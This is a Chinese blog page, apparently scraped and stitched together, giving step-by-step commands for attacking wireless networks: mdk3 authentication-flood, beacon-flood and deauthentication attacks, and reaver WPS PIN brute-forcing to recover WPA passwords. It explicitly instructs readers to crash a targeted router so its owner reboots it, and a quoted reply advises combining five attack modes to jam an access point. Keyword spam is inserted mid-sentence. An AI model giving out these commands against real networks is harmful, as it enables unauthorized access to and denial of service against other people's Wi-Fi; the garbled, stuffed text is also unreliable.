置顶

mdk3ap攻击软件,mdk4 攻击

作者:hacker | 分类:破解 | 浏览:137 | 日期:2022年10月16日

目录:

如何在kali中安装mdk3?

建议到kalilinux官网下载。下载完成之后,如果你需要虚拟机则在电脑上面已经安装好的虚拟机软件里面新建虚拟机配置镜像文件即可。

路由器pin死怎么办

重启之后关掉wps。

首先检测网卡:

ifconfig -a

然后模拟端口:

airmon-ng start wlan0

接下来用:

airodump-ng mon0

扫描ap找到你pin死的路由器mac

用mdk3 做身份验证攻击

mdk3 mon0 a -a mac(被pin死的路由器的mac)

身份验证攻击效果说明:

此攻击是针对无线AP的洪水攻击,又叫做身份验证攻击。其原理就是向AP发动大量的虚假的链接请求,这种请求数量一旦超 过了无线AP所能承受的范围,AP就会自动断开现有链接,使合法用户无法使用无线 *** 。迫使路由主人重启路由器。

说明:

此命令功能强大,使用错误会造成所有ap不能使用,请指定mac地址,然后使用,其余命令不要乱试。你要使用此命令的其他参数,请详细阅读此命令参数详解。

经测试此功能异常强大,但要慎用,不但会使被攻击的AP死机还会影响到其他可视范围内的AP。搞不好会把其他已经PJ的AP都搞瘫痪。

废话少说首先进入CDlinux,打开水滴或者打气筒搜索pin死的MAC地址(直接打开水滴或者3070驱动搜索无线MAC地址

然后点击左下角CDlnux图标,依次打开 无线安全--------mdk3-v6

进入mdk3后输入命令mdk3 mon0 a -a 40:16:9F:**:2C:B2(40:16:9F:**:2C:B2为你pin死的路由的MAC,注意空格和大小写)

回车后进入攻击模式,时间不要太长,最多半分钟就可以关闭对话框然后重新扫描 *** 看pin死的路由是不是已经不在了。等待主人重启吧

过时的wifi破解工具

之前我们讲过了fluxion和aircrack破解wifi的 ***

其实还有很多的wifi破解方式,不妨都试试。知晓每一个工具的优缺点,在合适的情境下去选择最适合的 ***

不幸的是下面讲的这些破解 *** 基本已经成了古董了,只可远观而不可亵玩焉。

因为已经不怎么管用了...

如果想了解wifi历史的人可以继续接着看下去,其他的嘛就快点去看其他文章吧

弄这么多不能用的wifi有什么用呢?之后我们在知道钓鱼wifi的时候会用到,这里我们先讲一下

mdk3 wlan1 b -f FakeAPName.txt -c 2

只需要这么一句话

下面开始我的失败尝试了,愿意看的请留下听我讲述历史...

其实看看也好,可以避免你们继续这样失败的尝试,少浪费一些时间

现在路由器防pin真的是防的很好,我pin了至少30次,只pin出来过机房的很老的一台路由器,其他的总是被pin死,看来这11000次也并不想想象中那样脆弱。这是我做完这次实验的感受

reaver是通过路由器上一个叫做wps的功能来实现攻击的,WPS是许多路由器上都有的一个功能,可以为用户提供简单的配置过程,它与设备中硬编码保存的一个PIN码绑定在一起。Reaver利用的就是PIN码的一个缺陷,最终的结果就是,只要有足够的时间,它就能破解WPA或WPA2的密码。

根据pin码破解的原理,可以看到只需要枚举11000种情况就会必然破解出pin码,从而通过pin得到wifi密码。 具体的为什么是11000种情况呢?

现在开始实现

1.将网卡调到监听模式

打开终端输入 airmon-ng start wlan0

2.扫描开启wps的路由器。

输入 wash -i wlan0mon

WPS Locked为No的就是开启wps服务的路由器,都可以尝试攻击

3.找到了开启WPS的wifi,接下来咱们就可以进行pin码爆破,下面主要说一下reaver的参数。

reaver 命令:

reaver -i mon0 -b mac -S -v

示例:

reaver -i mon0 -b MAC -a -S –d9 –t9 -vv)

应因状况调整参数(-c后面都已目标频道为1作为例子)

选择之前扫描出来的开启WPS的wifi,选择一个进行破解。

输入: reaver -i wlan1 -b 54:E6:FC:35:C5:82 -S -N -vv -c 4

在穷举的过程中,reaver会生成以路由mac地址为名的wpc文件,这个文件在kali系统中/etc/reaver/文件夹下。

一时半会pin不出来,过段时间pin的时候命令加参数 -s file.wpc,就会根据之前的进度继续pin。

最后pin完最后会显示WPS PIN(正确的pin码)和WPA PSK(wifi密码),同时如果WPS功能没关,pin码没修改,无论怎样修改密码,都可以通过pin码获取wifi密码: reaver -i wlan0mon -b mac -p pin 码,来再次得到密码

一般pin的过快,会把路由器pin死,所以 一般还会加上-d5 -t5参数 ,添加5秒延时,当然数值可以自己改。我添加了也照样被pin的死死的。不行了这个软件

很看好他,来试一下

1.打开终端输入wifite

2.我选择了all

3.结果一个也没整出来,他也是用的wps的来破解,现在用wps针对除了很老的路由器,其他的都不是很好办了

图形化界面,大家一看就会懂, 先选择网卡,扫描,破解

说一下主界面的右下角有一个 toolbox工具箱

试试

破解不好用,而且一打开他整个虚拟机都变得有些卡,破解的进度条根本不走

不推荐

我们来试一下他的这些附件

也都不管用,不知道是不是因为使用了https的缘故,反正他现在肯定是out了

参考的一些网站

七夜

freebuf 

请教:mdk3会彻底让路由器挂了吗?我攻击的一个快一个月没出现了。

要彻底弄死AP恐怕是很难的,不过楼主可以试试在有客户端连接此AP时,用-a -d -p -f -g这五种同时攻击(可以用一张网卡使用五次airmon-ng start wlan0虚拟出来同时攻击),那AP就算不死也会被严重干扰,无线连接无法正常连接。在这种情况下如果客户端是主人家那么就会重启路由了,不会等到AP没有无线信号时去重启路由了!

mdk3 攻击究竟有没有作用?

经过长期使用发现其实mdk3对部分路由有用mdk3ap攻击软件,有部分路由是防dos攻击mdk3ap攻击软件mdk3ap攻击软件,完全起不

在linux 下怎么才能用mdk3 这个命令啊 需要安装软件莫??

MDK3 是一款无线DOS 攻击测试工具mdk3ap攻击软件,能够发起Beacon Flood、Authentication DoS、Deauthentication/Disassociation Amok 等模式的攻击,另外它还具有针对隐藏ESSID 的暴力探测模式、802.1X 渗透测试、WIDS干扰等功能”。

——虽然这几句话被转mdk3ap攻击软件了N遍mdk3ap攻击软件,但我们还是以这句话开头;今天就围绕以上提到的几种攻击模式进行简单的折腾下:

首先激活无线网卡至监听模式,然后输入mdk3 --fullhelp查看详细帮助内容

beacon flood mode:

这个模式可以产生大量死亡SSID来充斥无线客户端的无线列表,从而扰乱无线使用者;我们甚至还可以自定义发送死亡SSID的BSSID和ESSID、加密方式(如wep/wpa2)等。

详细命令如下:

mdk3 mon0 b

-n ssid #自定义ESSID

-f filename #读取ESSID列表文件

-v filename #自定义ESSID和BSSID对应列表文件

-d #自定义为Ad-Hoc模式

-w #自定义为wep模式

-g #54Mbit模式

-t # WPA TKIP encryption

-a #WPA AES encryption

-m #读取数据库的mac地址

-c chan #自定义信道

-s pps #发包速率

mdk3 --help b #查看详细内容

Authentication DoS:

这是一种验证请求攻击模式:在这个模式里,软件自动模拟随机产生的mac向目标AP发起大量验证请求,可以导致AP忙于处理过多的请求而停止对正常连接客户端的响应;这个模式常见的使用是在reaver穷据路由PIN码,当遇到AP被“pin死”时,可以用这个模式来直接让AP停止正常响应,迫使AP主人重启路由!

mdk3 mon0 a

-a ap_mac #测试指定BSSID

-m #使用有效数据库中的客户端mac地址

-c #对应 -a ,不检查是否测试成功

-i ap_mac #对指定BSSID进行智能攻击

-s pps #速率,默认50

Deauthentication/Disassociation Amok:

这个模式看名称就知道大概mdk3ap攻击软件了:强制解除验证解除连接!在这个模式下,软件会向周围所有可见AP发起循环攻击......可以造成一定范围内的无线 *** 瘫痪(当然有白名单,黑名单模式),直到手动停止攻击!

mdk3 mon0 d

-w filename #白名单mac地址列表文件

-b filename #黑名单mac地址列表文件

-s pps #速率,这个模式下默认无限制

-c [chan,chan,chan,...] #信道,可以多填,如 2,4,5,1

Basic probing and ESSID Bruteforce mode:

基本探测AP信息和ESSID猜解模式

mdk3 mon0 p

-e ssid #待检测的ssid

-f filename #检测AP设置为隐藏的ssid列表文件

-t bssid #用bssid检测AP的信息

-s pps #速率,默认300

-b character set #设置字符集

802.1X tests:

802.1X 协议下的攻击测试

mdk3 mon0 x

0 - EAPOL Start packet flooding #EAPOL格式的报文洪水攻击

-n ssid

-t bssid #目标客户端的mac地址

-w WPA type

Set WPA type (1: WPA, 2: WPA2/RSN; default: WPA)

-u unicast cipher

Set unicast cipher type (1: TKIP, 2: CCMP; default: TKIP)

-m multicast cipher

Set multicast cipher type (1: TKIP, 2: CCMP; default: TKIP)

-s pps #速率,默认400

1 - EAPOL Logoff test #注销认证攻击

-t bssid #目标客户端的mac地址

-c bssid #目标ap的合法客户端mac

-s pps #速率,默认400

发表评论

访客 游客 2022-10-16 · 回复该评论
让路由器挂了吗?我攻击的一个快一个月没出现了。要彻底弄死AP恐怕是很难的,不过楼主可以试试在有客户端连接此AP时,用-a -d -p -f -g这五种同时攻击(可以用一张网卡使用五次airmon-ng

访客 游客 2022-10-16 · 回复该评论
IN(正确的pin码)和WPA PSK(wifi密码),同时如果WPS功能没关,pin码没修改,无论怎样修改密码,都可以通过pin码获取wifi密码: reaver -i wlan0mon -b mac -p pin 码,来再次得到密码 一般pin的过快,会把路由器pin死,所以 一般还会

取消
微信二维码
支付宝二维码